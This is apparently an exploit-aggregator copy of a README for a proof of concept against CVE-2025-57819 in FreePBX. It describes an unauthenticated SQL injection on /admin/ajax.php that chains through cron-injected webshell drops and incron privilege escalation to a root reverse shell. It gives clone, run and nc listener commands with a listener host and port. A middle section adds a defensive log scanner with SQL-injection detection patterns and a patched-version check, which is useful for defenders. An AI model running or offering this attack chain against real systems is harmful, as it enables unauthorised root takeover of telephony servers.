## https://sploitus.com/exploit?id=D3C0976F-73D0-56D5-A6FE-0D68A14D8753
# CVE-2025-57819 → FreePBX SQLi → RCE → Root
Full-chain PoC for CVE-2025-57819. Unauthenticated error-based SQL injection in FreePBX's endpoint module chains into a root shell via cron job injection and incron privilege escalation.
> **For authorized testing and research only. Do not use against systems you don't own.**
---
## What it does
```
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
```
1. Extracts DB info via error-based injection on `/admin/ajax.php`
2. Injects a cron job that writes a PHP webshell to the web root
3. Waits for cron to fire (~60s), confirms RCE as `asterisk`
4. Creates an incron trigger file that fires `fwconsole` hook as root
5. Catches reverse shell on your listener
---
## Setup
```bash
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
```
---
## Usage
```bash
python3 CVE-2025-57819.py <target> <listener-host> <listener-port> [--cleanup]
```
Start a listener first:
```bash
nc -lvnp 9999
```
Then run:
```bash
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
```
`--cleanup` removes the webshell and cron job after exploitation.
---
## Affected
FreePBX with the `endpoint` module installed. The `brand` parameter in `/admin/ajax.php` is passed unsanitized into a SQL query.
| FreePBX | Patched Version |
|---------|----------------|
| 15.x | `15.0.66` |
| 16.x | `16.0.89` |
| 17.x | `17.0.3` |
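For the defending side, here is an added example (not part of this PoC or of FreePBX) that flags web-server access-log hits on `/admin/ajax.php` whose `brand` value carries error-based injection markers, and checks a FreePBX version against the patched releases in the table above. It assumes Apache/nginx combined log format; the sample lines and the `module=endpoint` query parameter are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Patched releases from the table above (major -> first fixed version).
PATCHED = {15: (15, 0, 66), 16: (16, 0, 89), 17: (17, 0, 3)}

# Markers of error-based injection inside a query-string value (heuristic).
SQLI_MARKERS = re.compile(r"extractvalue\s*\(|updatexml\s*\(|'|--|#|/\*", re.I)

# Combined-format request line: ip ident user [ts] "METHOD url PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def parse_version(v: str) -> tuple:
    return tuple(int(x) for x in v.split("."))

def is_vulnerable_version(v: str):
    """True if v predates the fix for its major line, None if the major is unknown."""
    t = parse_version(v)
    fixed = PATCHED.get(t[0])
    return None if fixed is None else t < fixed

def flag_brand_injection(log_text: str) -> list:
    """Return (ip, status, brand) for /admin/ajax.php hits whose brand looks injected."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if parts.path != "/admin/ajax.php":
            continue
        # parse_qs percent-decodes values, so URL-encoded quotes and comments still match
        for brand in parse_qs(parts.query).get("brand", []):
            if SQLI_MARKERS.search(brand):
                hits.append((m["ip"], int(m["status"]), brand))
    return hits

# Constructed sample lines (not real traffic): one benign lookup, one injected, one off-path.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2025:10:00:00 +0000] "GET /admin/ajax.php?module=endpoint&brand=sangoma HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2025:10:00:01 +0000] "GET /admin/ajax.php?module=endpoint&brand=sangoma'%20and%20extractvalue(1,1)%23 HTTP/1.1" 500 231 "-" "python-requests/2.31"
10.0.0.5 - - [01/Sep/2025:10:00:02 +0000] "GET /admin/index.php?brand=sangoma' HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, status, brand in flag_brand_injection(SAMPLE_LOG):
        print(f"suspect SQLi from {ip} (HTTP {status}): brand={brand!r}")
    for ver in ("16.0.88", "16.0.89", "17.0.3"):
        print(ver, "vulnerable" if is_vulnerable_version(ver) else "patched")
```

A 500 response paired with a flagged `brand` value is the strongest signal here, since error-based injection depends on the database error reaching the client.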
---
## References
- [FreePBX Security Advisory GHSA-m42g-xg4c-5f3h](https://github.com/freepbx/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)
- [NVD: CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)
---
## Author
ozcanpng · [github.com/ozcanpng](https://github.com/ozcanpng) · [ozcanpng.dev](https://ozcanpng.dev)